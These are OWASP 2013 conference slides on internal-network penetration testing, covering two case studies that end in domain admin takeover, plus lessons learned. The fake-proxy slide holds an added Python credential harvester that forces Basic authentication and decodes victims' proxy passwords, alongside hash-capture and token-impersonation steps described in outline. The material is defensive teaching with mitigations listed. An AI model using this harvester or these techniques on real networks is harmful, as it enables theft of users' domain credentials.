Penetration Testing


OWASP EU Tour, Bucharest 2013
The OWASP Foundation, http://www.owasp.org

Penetration Testing - a way for improving our cyber security
Adrian Furtunǎ, PhD, OSCP, CEH
adif2k8@gmail.com

Copyright The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

Agenda
- Who am I
- Why this topic
- Case study 1
- Case study 2
- Lessons learned
- Conclusions
- Q&A

Who am I
- Member of the Pentest Team at KPMG Romania
- Doing pentests against various applications and systems: internal networks, public networks, web applications, mobile applications, wireless networks, social engineering, etc.
- Speaker at Hacktivity, DefCamp, Hacknet and other local security conferences
- Teaching assistant at Information Security Master programs (UPB, MTA and ASE): teaching penetration testing classes, organizing Capture the Flag contests

Why this topic?
- The need for more efficient cyber security
- Penetration testing is part of the defense-in-depth approach
- Verify the effectiveness of defense mechanisms and people
- Find weak spots in the defense layers: is my data safe?
- Show the real risk of a vulnerability
- Suggest corrective measures
- Re-verify
- Penetration testing can be used for improving our cyber security

To better clarify terms
- Penetration Testing, a.k.a. Pentesting, Ethical Hacking, Red Teaming
- Method for evaluating the security of an information system or network by simulating attacks from malicious outsiders or insiders
- Exploit vulnerabilities and dig much deeper
- Penetration Testing is: authorized, adversary based, ethical (for defensive purposes)
- Penetration Testing is not Vulnerability Assessment / Scanning
- (Diagram with two depth labels: "Tools find this" for the shallow layer, "Manual tests find this" for the deeper layer)

Case Study 1

Pentesting the internal network (2011)
- Objective: see what an internal malicious user could do, given simple physical network access
- Malicious user: visitor, contractor, malicious employee
- Targets: confidential data, client information, strategic business plans, etc.
- Initial access: physical network port in the users' subnet

Pentesting the internal network (2011) – cont.
1. Network mapping: IP ranges, host names
2. Service and OS discovery: Windows 7, Windows 2008 Server R2, common client ports open, IIS, MsSQL, Exchange, etc.
3. Vulnerability scanning: Nessus found 1 high, 30 medium, 39 low; the MsSQL server still had the default password for the sa user

Pentesting the internal network (2011) – cont.
4. Exploitation: add a local admin
5. Post-exploitation: info gathering, credentials to other systems
6. Pivoting: connect to the 2nd DB server, upload Meterpreter
7. Post-exploitation: list tokens, impersonate the Domain Admin token, create a Domain Admin user. Game Over
(Screenshot: Game Over, shown on the domain controller)

Case Study 2

Pentesting the (same) internal network (2012)
- Objective: see what an internal malicious user could do, given simple network access; re-test the findings from the previous year
- Malicious user: visitor, contractor, malicious employee
- Targets: confidential data, client information, strategic business plans, etc.
- Initial access: network port in the users' subnet

Pentesting the (same) internal network (2012) – cont.
1. Network mapping: the same as last year
2. Service and OS discovery: the same as last year
3. Vulnerability scanning: Nessus found 0 high, 21 medium, 20 low
Now what?
- No default/weak passwords
- No missing patches
- No exploitable configuration problems
- No SQL injection

Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 1
- Set up a fake local NetBIOS name server and respond to every name request with my IP address
- Set up multiple local services (HTTP, SMB) that request Windows (NTLM) authentication on connection
- Capture the resulting NTLM challenge/response hashes
- Captured around 50 NTLM hashes
- Cracked about 25% in a few hours using a dictionary attack with mangling rules
- Gained network access as a domain user (low privileges)
- Could access some shared files on the file server
- Not enough

Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 2
- Man-in-the-middle attack between the victim and the proxy server
- Set up a fake local proxy server
- Request Basic authentication
- Receive the user's credentials in clear text (only base64 encoded)
(Screenshot: the proxy authentication prompt the victim sees.) What would you do?
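Method 2 works because Basic authentication carries the user name and password in a trivially reversible encoding, and because the browser turns the fake proxy's challenge into a prompt that looks like an ordinary proxy login. The Python below is an added example, not the talk's code. It shows both sides of the exchange: the browser's first request, the fake proxy's 407 with a Basic challenge, and the resent request whose Proxy-Authorization header the fake proxy decodes. The interception step that makes the victim's traffic reach the fake proxy (ARP spoofing, a rogue WPAD/PAC answer, or similar) is assumed and not shown; the host name, realm and credentials are constructed for the example.

```python
import base64
from typing import Dict, Optional, Tuple

# Hypothetical realm string; Windows shows it in the credential prompt, so an attacker
# picks something that looks like the real corporate proxy.
REALM = "corp-proxy"


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP/1.x request head into (request line, lower-cased header map)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    request_line, *lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return request_line, headers


def proxy_credentials(headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Decode 'Proxy-Authorization: Basic <base64>' into (user, password).
    No header, another scheme (NTLM/Negotiate) or malformed base64 yields None."""
    scheme, _, token = headers.get("proxy-authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        userpass = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    # RFC 7617: the user-id cannot contain ':' but the password can, so split on the first one.
    user, sep, password = userpass.partition(":")
    return (user, password) if sep else None


def rogue_proxy(raw_request: bytes) -> Tuple[bytes, Optional[Tuple[str, str]]]:
    """One turn of the fake proxy: returns (response bytes, harvested credentials).
    Offering only Basic is deliberate: a browser that would otherwise authenticate
    silently with NTLM or Kerberos now has to ask the user for a password."""
    _, headers = parse_request(raw_request)
    creds = proxy_credentials(headers)
    if creds is None:
        challenge = (b"HTTP/1.1 407 Proxy Authentication Required\r\n"
                     + b'Proxy-Authenticate: Basic realm="' + REALM.encode("ascii") + b'"\r\n'
                     + b"Content-Length: 0\r\nConnection: close\r\n\r\n")
        return challenge, None
    # A real MITM would now forward the request to the genuine proxy so the victim
    # notices nothing; here the exchange simply ends with an empty 200.
    return b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", creds


# Constructed sample exchange: the victim's first request, the resent request the browser
# produces after the user fills in the prompt (domain\user as the user-id), and a request
# carrying a non-Basic scheme that the fake proxy simply challenges again.
FIRST_REQUEST = (b"GET http://intranet.example/ HTTP/1.1\r\n"
                 + b"Host: intranet.example\r\n\r\n")
SECOND_REQUEST = (b"GET http://intranet.example/ HTTP/1.1\r\n"
                  + b"Host: intranet.example\r\n"
                  + b"Proxy-Authorization: Basic " + base64.b64encode(b"CORP\\jdoe:Welcome123")
                  + b"\r\n\r\n")
NTLM_REQUEST = (b"GET http://intranet.example/ HTTP/1.1\r\n"
                + b"Proxy-Authorization: NTLM TlRMTVNTUAABAAAA\r\n\r\n")

if __name__ == "__main__":
    for req in (FIRST_REQUEST, SECOND_REQUEST, NTLM_REQUEST):
        reply, creds = rogue_proxy(req)
        print(reply.split(b"\r\n", 1)[0].decode(), creds)
```

The prompt the victim sees names only the realm the attacker chose, so user training ("would you type your domain password into an unexpected proxy dialog?") is the last line of defence; the structural fixes are to authenticate to the proxy with Kerberos or NTLM rather than Basic, to pin proxy discovery (no WPAD over the local network) and to make the interception itself hard (dynamic ARP inspection, 802.1X).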

Pentesting the (same) internal network (2012) – cont.
5. Exploitation: got the (global) local admin password from a special user; could connect as admin on any workstation
6. Pivoting: searched the machines in the IT subnet for interesting credentials / tokens; found a process running as a domain admin user
7. Exploitation: impersonate the domain admin, add a user to the Domain Admins group. Game Over

Lessons Learned

Pentest comparison

                                  2011      2012
Low hanging fruits removed        no        yes
IT personnel vigilance            low       high
Network prepared for pentest      no        yes
Existing vulnerabilities          yes       yes (lower number)
Overall exploitation difficulty   medium    high

Consultant's advice
- Run periodic vulnerability assessments yourself (e.g. Nessus scans)
- Prepare your network before a pentest (you should always be prepared, by the way)
- A homogeneous network is easier to defend than a heterogeneous one
- Do not give regular users local admin rights
- Patch, patch, patch
- Educate users about security risks

Conclusions
- Penetration testing can be used for improving our cyber security
- Do it periodically, with specialized people
- Mandatory for new applications / systems before putting them in production
- Vulnerability assessment is not penetration testing

Q&A

Thank You!
Adrian Furtunǎ, PhD, OSCP, anfurtuna
